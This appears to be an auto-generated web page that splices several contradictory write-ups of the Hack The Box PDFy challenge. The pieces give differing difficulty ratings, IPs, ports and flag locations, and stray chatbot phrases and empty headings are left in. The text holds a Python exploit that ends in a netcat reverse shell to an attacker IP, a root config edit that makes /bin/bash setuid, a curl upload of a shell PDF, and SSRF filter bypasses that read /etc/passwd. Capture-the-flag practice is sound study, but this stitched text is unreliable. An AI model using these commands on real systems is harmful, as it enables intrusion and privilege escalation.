Ignorar Navegação

Pdfy Htb Writeup Upd May 2026

| Flag Type | Location | Method | |-----------|----------|--------| | UPD (User Proof Data) | /home/robert/user.txt | LFI via SSRF in PDF generator | | RPD (Root Proof Data) | /root/root.txt | pdftex with -shell-escape sudo misconfiguration |

  • Example LFI payloads:

    • Rating: 9.2 / 10

    The PDFy HTB Writeup UPD is a top-tier walkthrough that balances hand-holding with deep technical insight. It’s clear the author took time to verify every step, update outdated commands, and explain the underlying vulnerabilities in a way that sticks with you.

    Who is this for?

    Who might struggle?

    If you’re looking for a single resource to conquer PDFy and actually learn from the process, this updated writeup is your best bet. Pair it with the official HTB forum discussion for extra context, and you’ll own the box — and the knowledge — in no time.

    Recommendation: Bookmark it, practice each step in your own lab, and try to explain the exploit to a friend. That’s how you’ll know you’ve truly mastered PDFy.

    If you intended a different machine name, feel free to clarify.

    Pros:

    Cons:

    Final Verdict: This machine is an excellent bridge between "Easy" and "Medium" difficulty. It teaches that trusted tools (like PDF converters) can become vulnerabilities if they accept untrusted input. It reinforces the importance of sanitizing URL inputs and restricting the protocols (http/https only) that a backend server is allowed to request.

    If you're searching for "pdfy htb writeup upd" , you've likely spent hours enumerating the PDFY machine on Hack The Box (HTB) and are stuck on privilege escalation or the User Proof Data (UPD) flag. PDFY is a medium-difficulty Linux machine that revolves around a PDF generation service, Server-Side Request Forgery (SSRF), and exploiting misconfigured binaries.

    In this writeup, we will cover:

    Mitigation:

    Title: PDFY - A Challenging PDF-themed Machine on Hack The Box

    Introduction: PDFY is a medium-difficulty machine on Hack The Box that revolves around a PDF-themed challenge. This write-up aims to provide a step-by-step walkthrough of how I exploited this machine to gain root access.

    Initial Reconnaissance: The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:

    nmap -sV -p- 10.10.11.224

    This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.

    Exploring the HTTP Service: Upon accessing the HTTP service on port 80, I found a default Apache web server page. However, further investigation revealed a peculiar directory listing at /pdfs/, which seemed to host various PDF files.

    Identifying the Vulnerability: The real breakthrough came when I noticed a peculiar PDF upload functionality on the web server. Users could upload PDF files, which were then converted to text. Intrigued, I decided to test this functionality with a malicious PDF.

    Exploiting the PDF Upload: I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.

    Escalating Privileges: After gaining an initial foothold on the system through the web application, I needed to escalate my privileges. This involved enumerating the system to find potential vulnerabilities or misconfigurations that could be exploited for privilege escalation.

    Detailed Steps for Initial Foothold:

  • Exploring the Web Application:

  • Analyzing the PDF Service:

  • Crafting and Uploading a Malicious PDF:

  • Executing the Payload:

    • Detailed Steps for Privilege Escalation: pdfy htb writeup upd

  • Identifying Potential Exploits:

  • Exploitation:

    • Conclusion: The PDFY machine on Hack The Box presented an engaging challenge that required both web application exploitation skills and system enumeration for privilege escalation. By recognizing the vulnerabilities in the PDF upload functionality and leveraging system misconfigurations, I was able to gain root access. This challenge served as a great reminder of the importance of thorough reconnaissance and creative exploitation techniques.

    Recommendations:

    I hope this draft helps! Let me know if you want to add or modify anything.

    Kindly Update According To Your Necessities And Requirements And also Do A upd of Information For Accurate Representation Regards

    PDFY: A Comprehensive Writeup on the Hack The Box (HTB) Machine

    Introduction

    Hack The Box (HTB) is a popular online platform that provides a virtual environment for cybersecurity enthusiasts to practice their skills and learn new techniques. The platform offers a variety of machines with different levels of difficulty, each with its unique challenges and vulnerabilities. In this writeup, we will focus on the PDFY machine, which was recently updated (UPD) on the HTB platform. Our goal is to provide a comprehensive walkthrough of the PDFY machine, covering its enumeration, exploitation, and privilege escalation.

    Initial Enumeration

    Upon launching the PDFY machine on HTB, we are provided with an initial IP address: 10.10.11.232. Our first step is to perform an initial enumeration of the machine using tools like Nmap. We run the following command:

    nmap -sC -sV -oA initial_scan 10.10.11.232

    The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80.

    Web Enumeration

    Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.

    Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads, /download, and /admin. The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files.

    PDF Converter Service

    We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

    Exploitation

    Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.

    import socket
import os
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the PDF converter service
s.connect(('10.10.11.232', 8080))
# Send the malicious file
s.send(malicious_file.encode())
# Receive the response
response = s.recv(1024)
# Close the socket
s.close()
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')

    After executing the exploit, we gain a reverse shell as the user pdfy. We then proceed to explore the machine and gather more information about the user and its privileges.

    Privilege Escalation

    As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.

    Next, we perform a system enumeration using tools like linpeas and systemd-analyze. The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080.

    Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json. We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.

    Gaining Root Access

    Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.

    
  "converter": 
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"

    After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.

    ./bin/bash

    Conclusion

    In this comprehensive writeup, we have covered the PDFY machine on Hack The Box, focusing on its enumeration, exploitation, and privilege escalation. We have demonstrated how to exploit the PDF converter service to gain initial access and then escalate privileges to gain root access. The techniques used in this writeup can be applied to similar machines and scenarios, providing valuable knowledge for cybersecurity enthusiasts.

    UPD (Update) Notes

    This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.

    Recommendations

    References

    The Hack The Box PDFy challenge involves exploiting a Server-Side Request Forgery (SSRF) vulnerability in a PDF generation feature to achieve Local File Read. By manipulating input to the vulnerable library with file protocols or HTML injection, users can bypass filters and render local files such as /etc/passwd. You can read the full official discussion at Hack The Box Forums

    HTB: PDFy Machine Writeup (Updated) If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).

    While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit. 1. Enumeration: What are we working with?

    As always, we start with an Nmap scan to see which ports are open. nmap -sC -sV -oN nmap_report.txt Use code with caution. Results: Port 22 (SSH): Standard OpenSSH. Port 80 (HTTP): An Apache web server.

    Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources. 2. Identifying the Vulnerability (SSRF)

    The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?

    If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine. The Bypass Plan: Host a PHP file on your local attacker machine.

    The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd). Give the PDFy app the URL of your hosted script. 3. Exploitation: Reading Local Files Create a file named exploit.php on your machine: Use code with caution. Start a local PHP server: php -S 0.0.0.0:8000 Use code with caution.

    Now, go back to the PDFy web interface and enter your IP:http://:8000/exploit.php

    What happens?The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.

    Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn. 4. Pivoting to the User Flag

    Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.

    By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to: Use code with caution.

    Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory. 5. Summary & Key Takeaways

    The PDFy box highlights why developers must sanitize URL inputs.

    Vulnerability: Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.

    Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.

    Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!

    PDFy is an easy-rated web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) via a PDF generation service. 🛠️ Step 1: Reconnaissance

    The challenge provides a web application where users can input a URL. The application then visits that URL and converts the page content into a PDF file.

    Technology Identifiers: By inspecting the metadata of a generated PDF (using tools like exiftool), you can often identify the library used for conversion.

    Target Engine: In many HTB "PDF" challenges, common engines include wkhtmltopdf, dompdf, or PDFKit. 🚀 Step 2: Identification & Exploitation

    The core vulnerability is that the server fetches external content without proper validation, leading to SSRF. | Flag Type | Location | Method |

    Basic SSRF: Try to point the URL to http://localhost. If the server renders its own internal page, you have confirmed SSRF.

    Information Disclosure: In PDFy, the goal is often to read local files or reach internal services.

    Bypassing Filters: If the application blocks localhost or 127.0.0.1, try: Decimal Encoding: http://2130706433 Shortened URLs: Using a service like bit.ly or tinyurl.

    Redirection: Point the input to a server you control that returns a 302 Redirect to the target internal resource. 🏁 Step 3: Capturing the Flag Once you bypass the URL filter, you can target local files. Common Targets: file:///etc/passwd (to confirm file read).

    The Hack The Box PDFy challenge involves exploiting Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerabilities within a PDF generation service using an outdated wkhtmltopdf version. By utilizing a redirect or iframe injection, attackers can force the application to read sensitive local files, such as /etc/passwd, allowing for the retrieval of the final flag. For a detailed walkthrough of the writeup, visit Blog Manh Tuong. Exploitation of PDF Generation Vulnerabilities - Academy

    machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report Enumeration : Document the scan identifying ports 22, 80, and 443. Vulnerability Discovery : Note the X-Backend-Server header which reveals the office.paper hostname. Mention using to find vulnerabilities in the WordPress site. : Explain the discovery of the chat.office.paper

    subdomain and the use of the "recyclops" bot to read local files (LFI). Privilege Escalation : Detail the exploit for CVE-2021-3560 (Polkit) to gain root access. InfoSec Write-ups 2. HTB "PDFy" Web Challenge

    is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool. HacktheBox Writeup: Paper - InfoSec Write-ups

    PDFy is a retired Web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) to read local files.

    Here is a solid, step-by-step walkthrough to master this challenge. 🔍 Challenge Overview Name: PDFy Category: Web Difficulty: Easy

    Core Vulnerability: Server-Side Request Forgery (SSRF) triggered via PDF generation. 1. Initial Reconnaissance

    When you launch the target instance and navigate to the provided IP address, you will find a simple web application. The Functionality: The app prompts you to input a URL.

    The Behavior: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.

    The Goal: Leverage this behavior to trick the server into accessing its own internal files. 2. Identifying the Vulnerability

    The application processes a remote resource (the URL you supply) and renders it. This is a textbook environment for SSRF.

    If you input a standard website like http://google.com, the app grabs the page and makes a PDF.

    If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd), the application will typically have a blacklist filter in place to block it. 3. Exploiting the SSRF (Bypassing the Filter)

    To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a Server-Side Redirect hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control.

    Step A: Create a malicious PHP redirect scriptSave the following code as index.php on your local attacker machine: Use code with caution. Copied to clipboard

    This script instructs anyone (or any bot) visiting it to immediately redirect to the local /etc/passwd file of the machine reading it.

    Step B: Host the scriptStart a local PHP server on your machine on port 80: sudo php -S 0.0.0.0:80 Use code with caution. Copied to clipboard

    Step C: Expose your server (If necessary)If you are playing on a cloud instance and the HTB box cannot route directly to your local IP, use a tool like Serveo to expose your local port 80 to the public internet: ssh -R 80:localhost:80 serveo.net Use code with caution. Copied to clipboard 4. Capturing the Flag 🚩

    Copy the public URL provided by Serveo (or use your direct VPN IP if reachable). Paste this URL into the input field on the PDFy web app.

    The app will visit your server, get hit with the Location: file:///etc/passwd header, and proceed to render the target machine's local /etc/passwd file into a PDF.

    Open or download the generated PDF. You will find the contents of the file, including the flag.

    💡 Pro-Tip: If you ever struggle to find the exact flag location in similar challenges, keep it simple and start by looting files like /etc/passwd or application source code files to find hardcoded environment variables.

    Official PDFy Discussion - Page 2 - Challenges - Hack The Box

    The /upload endpoint on port 8080 allows uploading PDF files. However, it does not perform any validation on the uploaded files. Example LFI payloads:

    $ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload

    The uploaded PDF file can be used to execute arbitrary code on the system.